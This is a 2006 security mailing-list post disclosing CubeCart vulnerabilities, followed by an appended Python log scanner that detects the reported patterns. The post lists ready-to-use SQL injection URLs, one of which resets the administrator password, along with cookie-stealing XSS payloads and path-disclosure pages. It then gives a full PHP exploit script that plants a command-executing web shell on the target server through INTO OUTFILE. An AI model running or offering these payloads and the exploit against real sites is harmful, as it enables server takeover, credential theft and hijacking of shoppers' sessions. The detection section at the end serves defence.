Computer Security
[EN] securityvulns.ru

From: HACKERS PAL <security_(at)_soqor.net>
Date: 27.09.2006
Subject: CubeCart Multiple input Validation vulnerabilities

Hello,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


SQL injection


admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
It will reset the password for the administrator.
--

admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
--
view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
--
view_doc.php?view_doc=-1'%20union%20select%201,2/*
--
admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
/***************************************/
XSS
admin/print_order.php?order_id=<script>alert(document.cookie);</script>
--
view_order.php?order_id=<script>alert(document.cookie);</script>
--
admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript>
admin/nav.php?la_search_home=<script>alert(document.cookie);</script>
and language variables for this file ..
--
admin/image.php?image=<script>alert(document.cookie);</script>
--
admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script>
admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script>
admin/header.inc.php?charset='><script>alert(document.cookie);</script>
and all other variables in this file
--
footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>
--
header.inc.php?site_name=</title><script>alert(document.cookie);</script>
and all other variables in the file.
--
/***************************************/

Full path

information.php
language.php
link_navi.php?cat_id=1
list_docs.php
popular_prod.php
sale.php
check_sum.php
spotlight.php
cat_navi.php

/***************************************/

Exploit :-

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* CubeCart Remote sql injection exploit
/*            By : HACKERS PAL
/*             WwW.SoQoR.NeT
/*
/* Tested on CubeCart 2.0.X  and maybe other versions are injected
*/
print_r('
/**********************************************/
/*   CubeCart Remote sql injection exploit    */
/*     by HACKERS PAL <security@soqor.net>    */
/*         site: http://www.soqor.net         */');
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host
/* Example:                                   */
/*  php '.$argv[0].' http://localhost/CubeCart/
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit1="/cat_navi.php";
        Function get_page($url)
        {

                 if(function_exists("file_get_contents"))

                 {

                      $contents = file_get_contents($url);

                         }
                         else
                         {
                             $fp=fopen("$url","r");
                             while($line=fread($fp,1024))
                             {
                              $contents=$contents.$line;
                             }


                                 }
                      return $contents;
        }

    $page = get_page($url.$exploit1);

            $pa=explode("<b>",$page);
            $pa=explode("</b>",$pa[2]);
            $path = str_replace("cat_navi.php","",$pa[0])."soqor.
php";
            $var='\ ';
            $var  = str_replace(" ","",$var);
            $path = str_replace($var,"/",$path);
            $exploit2="/view_doc.php?view_doc=-
1'%20union%20select%20'<?php%20system(".
'$_GET[cmd]'.");%20?>','WwW.SoQoR.
NeT'%20INTO%20OUTFILE%20'$path'%20from%20store_do
cs/*";
    $page_now = get_page($url.$exploit2);
    if(ereg("mysql_fetch_array()",$page_now))
    {
         $newurl=$url."/soqor.php?cmd=id";
         Echo "\n[+] Go TO ".str_replace("//","/",$newurl)."\n[+] Change id to any command you want :)";
    }
    else
    {
         Echo "\n[-] Exploit Faild";
    }
    Die("\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/")
;

?>

#WwW.SoQoR.NeT
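
A detection sketch for the request patterns listed in this advisory, added here as an example and not part of the original post or of CubeCart: it percent-decodes query strings from web-server access logs and flags SQL metacharacters in the reported parameters, script markup in any parameter, and template files requested directly with parameters. The log lines, the /shop/ prefix, the function names and the assumption that the listed templates are never legitimately requested with parameters are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory reports as reaching SQL queries unfiltered.
SQL_PARAMS = {"order_id", "view_doc", "user_name"}
# Assumption: these templates are only include()d, never requested with parameters.
INCLUDE_FILES = ("header.inc.php", "footer.inc.php", "admin/nav.php")

SQLI = re.compile(r"'|\bunion\b.+\bselect\b|into\s+outfile|/\*", re.I)
XSS = re.compile(r"<\s*/?\s*(script|title|noscript)\b|[\"']\s*>", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP range).
SAMPLE_LOG = """\
192.0.2.10 - - [27/Sep/2006:10:00:01 +0000] "GET /shop/view_doc.php?view_doc=3 HTTP/1.1" 200 5120
192.0.2.44 - - [27/Sep/2006:10:00:07 +0000] "GET /shop/view_doc.php?view_doc=-1'%20union%20select%201,2/* HTTP/1.1" 200 812
192.0.2.44 - - [27/Sep/2006:10:00:09 +0000] "GET /shop/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/* HTTP/1.1" 200 640
192.0.2.44 - - [27/Sep/2006:10:00:12 +0000] "GET /shop/header.inc.php?site_name=%3C/title%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1" 200 900
""".splitlines()

def classify(log_line):
    """Return the sorted findings for one access-log line ([] if it looks benign)."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    # parse_qsl percent-decodes names and values, so %20union%20select is matched as text.
    params = parse_qsl(target.query, keep_blank_values=True)
    findings = set()
    for name, value in params:
        if name in SQL_PARAMS and SQLI.search(value):
            findings.add("sqli:" + name)
        if XSS.search(value):
            findings.add("xss:" + name)
    if params and target.path.endswith(INCLUDE_FILES):
        findings.add("direct-include:" + target.path.rsplit("/", 1)[-1])
    return sorted(findings)

def scan(lines):
    """Map client IP -> set of findings, so repeated probing from one source stands out."""
    hits = {}
    for line in lines:
        for finding in classify(line):
            hits.setdefault(line.split(" ", 1)[0], set()).add(finding)
    return hits

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG).items():
        print(ip, sorted(findings))
```

A legitimate user_name containing an apostrophe also matches the SQL pattern, so hits are triage leads rather than confirmed attacks.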
